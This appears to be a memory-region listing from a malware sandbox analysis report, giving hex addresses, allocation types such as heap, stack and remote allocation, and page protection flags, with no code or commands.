||
429000
|
unkown
|
page read and write
|
||
7140000
|
direct allocation
|
page read and write
|
||
23A70000
|
trusted library allocation
|
page read and write
|
||
7110000
|
direct allocation
|
page read and write
|
||
760F000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
7B0C000
|
stack
|
page read and write
|
||
2716000
|
heap
|
page read and write
|
||
238B0000
|
direct allocation
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
8580000
|
trusted library allocation
|
page execute and read and write
|
||
2351F000
|
heap
|
page read and write
|
||
271E000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
2718000
|
heap
|
page read and write
|
||
6D4E2000
|
unkown
|
page readonly
|
||
3020000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page read and write
|
||
587000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
71C0000
|
direct allocation
|
page read and write
|
||
3160000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
7130000
|
direct allocation
|
page read and write
|
||
23C0E000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
2353B000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
437000
|
unkown
|
page readonly
|
||
2351F000
|
heap
|
page read and write
|
||
2351E000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
34BE000
|
stack
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23A7A000
|
heap
|
page read and write
|
||
23880000
|
direct allocation
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
700E000
|
stack
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
435000
|
unkown
|
page readonly
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7388000
|
heap
|
page read and write
|
||
7850000
|
trusted library allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
271B000
|
heap
|
page read and write
|
||
BB08000
|
direct allocation
|
page execute and read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7180000
|
direct allocation
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
852D000
|
stack
|
page read and write
|
||
271E000
|
heap
|
page read and write
|
||
7860000
|
trusted library allocation
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
24400000
|
trusted library allocation
|
page read and write
|
||
4A10000
|
trusted library allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
347F000
|
unkown
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23512000
|
heap
|
page read and write
|
||
5434000
|
trusted library allocation
|
page read and write
|
||
2354A000
|
heap
|
page read and write
|
||
6F0E000
|
stack
|
page read and write
|
||
27E0000
|
heap
|
page readonly
|
||
2353C000
|
heap
|
page read and write
|
||
2F6F000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23A7B000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
9B0000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
23CB5000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
23512000
|
heap
|
page read and write
|
||
2351E000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
435000
|
unkown
|
page readonly
|
||
2353C000
|
heap
|
page read and write
|
||
761A000
|
heap
|
page read and write
|
||
7FF000
|
stack
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2F6D000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
459A000
|
remote allocation
|
page execute and read and write
|
||
2352D000
|
heap
|
page read and write
|
||
9D08000
|
direct allocation
|
page execute and read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
5ED1000
|
trusted library allocation
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
8AA0000
|
trusted library allocation
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
23516000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
2354A000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23C47000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23910000
|
direct allocation
|
page read and write
|
||
2354A000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
87DC000
|
stack
|
page read and write
|
||
75EE000
|
stack
|
page read and write
|
||
259F000
|
stack
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7055000
|
heap
|
page execute and read and write
|
||
23C03000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2E39000
|
stack
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
6066000
|
trusted library allocation
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
760B000
|
heap
|
page read and write
|
||
3390000
|
trusted library allocation
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
75E0000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23C5B000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
4A70000
|
trusted library allocation
|
page execute and read and write
|
||
23511000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
2355A000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
425000
|
unkown
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
761A000
|
heap
|
page read and write
|
||
30FE000
|
stack
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
760B000
|
heap
|
page read and write
|
||
8630000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
75DB000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
4A60000
|
heap
|
page readonly
|
||
8AE0000
|
trusted library allocation
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
271C000
|
heap
|
page read and write
|
||
9B5000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
23A72000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
433000
|
unkown
|
page read and write
|
||
97E000
|
stack
|
page read and write
|
||
23850000
|
direct allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
709F000
|
stack
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
6C7000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
33B0000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
trusted library allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
49E0000
|
trusted library allocation
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
361C000
|
stack
|
page read and write
|
||
23BE6000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page read and write
|
There are 794 hidden memdumps, click here to show them.